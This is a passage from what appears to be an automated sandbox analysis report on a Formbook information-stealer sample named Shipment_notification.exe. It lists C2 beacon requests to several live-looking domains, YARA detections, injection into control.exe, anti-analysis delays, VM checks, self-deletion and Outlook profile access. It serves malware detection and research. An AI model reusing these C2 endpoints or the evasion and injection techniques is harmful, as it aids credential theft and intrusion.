            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://www.drkathleensanders.com/rs5b/
            Accept-Language: en-US
            Accept-Encoding: gzip, deflate
            Data Ascii: uyxvg=fpfgz4NCsHlh~ecuwJtddhPm2bPQPbRNBszAhD5GvP4Zcu7jlbF7U8gnbD0mBZ~ALecRyCXeNt4kl9lwUK7AuV5XfkwQeu0aCziesSGNfhz4nCaVN0Cmuc9V~2nM7KKD~eygnsmMwXhwGKhe3KGrRxICZI~kMrCMlCsz27YC(tX5IDe8CA).
          Source: unknown DNS traffic detected: queries for: www.emagrecarapido.store
          Source: global traffic HTTP traffic detected:
            GET /rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA HTTP/1.1
            Host: www.isabellagambitta.com
            Connection: close
          Source: global traffic HTTP traffic detected:
            GET /rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhA HTTP/1.1
            Host: www.drkathleensanders.com
            Connection: close
          Source: global traffic HTTP traffic detected:
            GET /rs5b/?uyxvg=nOUSwineJuxPGPhQvt4EE68jEsCX+f+F3Zzf53EwbVXghGVs+qBfV9lnV789trdHPD+OYXwXTJgtqB6myIQJ1SqB2q7gB4Y0Vw==&L6HRe=HinkmsLDjhA HTTP/1.1
            Host: www.carcosainvest.com
            Connection: close
          Source: global traffic HTTP traffic detected:
            GET /rs5b/?uyxvg=zhbsihX/pGFJaZpy6dND3H78PJ7JxpKHxXOuen1DNaNorGCumHf7SvafvJLlAK1tbLNpDx0WdS8kjnRSnmRz/gORsH5hLjUWLg==&L6HRe=HinkmsLDjhA HTTP/1.1
            Host: www.piergitarshoes.com
            Connection: close
          Source: global traffic HTTP traffic detected:
            GET /rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhA HTTP/1.1
            Host: www.ywtxsm.com
            Connection: close
          Source: global traffic HTTP traffic detected:
            GET /rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhA HTTP/1.1
            Host: www.peramid.xyz
            Connection: close
          Source: global traffic HTTP traffic detected:
            GET /rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhA HTTP/1.1
            Host: www.locationsbormes.com
            Connection: close

          E-Banking Fraud

          Source: Yara match File source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: Shipment_notification.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: String function: 01AEB150 appears 35 times
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E5A3 NtCreateFile
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E653 NtReadFile
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E6D3 NtClose
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E783 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E64E NtReadFile
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E77D NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_0041E7FD NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B299A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B298F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B295D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B297A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B296E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B299D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29950 NtQueueApcThread
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B298A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29820 NtEnumerateKey
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B2B040 NtSuspendThread
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B2A3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29B00 NtSetValueKey
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29A10 NtQuerySection
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B295F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B2AD30 NtSetContextThread
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29560 NtWriteFile
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B2A710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29770 NtSetInformationFile
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B2A770 NtOpenThread
          Source: C:\Users\user\Desktop\Shipment_notification.exe Code function: 2_2_01B29760 NtOpenProcess
          Source: Shipment_notification.exe, 00000000.00000002.340502146.00000000035E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameOutimurs.dll2 vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000000.00000002.336955451.00000000026B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCruiser.dll, vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000000.00000002.336955451.00000000026A7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCruiser.dll, vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000000.00000002.336955451.0000000002627000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCruiser.dll, vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000000.00000002.353586112.0000000006DF0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameOutimurs.dll2 vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000002.00000003.333262180.00000000018A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000002.00000003.336325695.0000000001A43000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A85000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000002.00000002.378214888.0000000001BDF000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Shipment_notification.exe
          Source: Shipment_notification.exe Binary or memory string: OriginalFilenameCYYO.exe> vs Shipment_notification.exe
          Source: Shipment_notification.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Shipment_notification.exe ReversingLabs: Detection: 39%
          Source: Shipment_notification.exe Virustotal: Detection: 43%
          Source: C:\Users\user\Desktop\Shipment_notification.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
          Source: C:\Users\user\Desktop\Shipment_notification.exe Process created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
          Source: C:\Users\user\Desktop\Shipment_notification.exe Process created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\Shipment_notification.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Shipment_notification.exe.log
          Source: C:\Windows\SysWOW64\control.exe File created: C:\Users\user\AppData\Local\Temp\10W12dX
          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/3@12/7
          Source: Shipment_notification.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Shipment_notification.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\Shipment_notification.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Shipment_notification.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Shipment_notification.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Shipment_notification.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: CYYO.pdb source: Shipment_notification.exe
          Source: Binary string: wntdll.pdbUGP source: Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Shipment_notification.exe, Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CYYO.pdbSHA256 source: Shipment_notification.exe
          Source: Binary string: control.pdbUGP source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00411824 push ds; ret 2_2_00411825
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_004108E0 push ecx; retf 2_2_004108E1
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041BC00 push eax; iretd 2_2_0041BC01
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00410CF7 push ecx; iretd 2_2_00410D0E
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041A550 push ecx; retf 2_2_0041A55A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041B56C push ss; retf 2_2_0041B56D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041A523 push edx; ret 2_2_0041A524
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00405DEB push 00000056h; retf 2_2_00405DEF
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00401D80 push eax; ret 2_2_00401D82
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041B5B8 pushad ; iretd 2_2_0041B5B9
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00406E76 pushfd ; ret 2_2_00406E77
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00410631 push ecx; retf 2_2_00410632
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00405F31 push ss; iretd 2_2_00405F51
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B3D0D1 push ecx; ret 2_2_01B3D0E4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.877600970637655

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\control.exeFile deleted: c:\users\user\desktop\shipment_notification.exe
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipment_notification.exe TID: 1364Thread sleep time: -40023s >= -30000s
          Source: C:\Users\user\Desktop\Shipment_notification.exe TID: 3648Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 4540Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB5BA5 rdtsc 2_2_01BB5BA5
          Source: C:\Users\user\Desktop\Shipment_notification.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 884
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Shipment_notification.exeThread delayed: delay time: 40023
          Source: explorer.exe, 00000003.00000003.548908442.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.533768505.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535250683.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.560492432.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
          Source: explorer.exe, 00000003.00000000.357414824.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000003.550742798.000000000870B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000003.00000000.357414824.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000003.550742798.000000000870B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.582481631.0000000004424000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000003.550742798.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.357414824.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B651BE mov eax, dword ptr fs:[00000030h]2_2_01B651BE
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B14D3B mov eax, dword ptr fs:[00000030h]2_2_01B14D3B
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB8D34 mov eax, dword ptr fs:[00000030h]2_2_01BB8D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF3D34 mov eax, dword ptr fs:[00000030h]2_2_01AF3D34
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEAD30 mov eax, dword ptr fs:[00000030h]2_2_01AEAD30
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0C577 mov eax, dword ptr fs:[00000030h]2_2_01B0C577
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0C577 mov eax, dword ptr fs:[00000030h]2_2_01B0C577
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B07D50 mov eax, dword ptr fs:[00000030h]2_2_01B07D50
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B23D43 mov eax, dword ptr fs:[00000030h]2_2_01B23D43
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B63540 mov eax, dword ptr fs:[00000030h]2_2_01B63540
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF849B mov eax, dword ptr fs:[00000030h]2_2_01AF849B
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA14FB mov eax, dword ptr fs:[00000030h]2_2_01BA14FB
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66CF0 mov eax, dword ptr fs:[00000030h]2_2_01B66CF0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66CF0 mov eax, dword ptr fs:[00000030h]2_2_01B66CF0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B66CF0 mov eax, dword ptr fs:[00000030h]2_2_01B66CF0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB8CD6 mov eax, dword ptr fs:[00000030h]2_2_01BB8CD6
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1BC2C mov eax, dword ptr fs:[00000030h]2_2_01B1BC2C
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB740D mov eax, dword ptr fs:[00000030h]2_2_01BB740D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB740D mov eax, dword ptr fs:[00000030h]2_2_01BB740D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB740D mov eax, dword ptr fs:[00000030h]2_2_01BB740D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA1C06 mov eax, dword ptr fs:[00000030h]2_2_01BA1C06
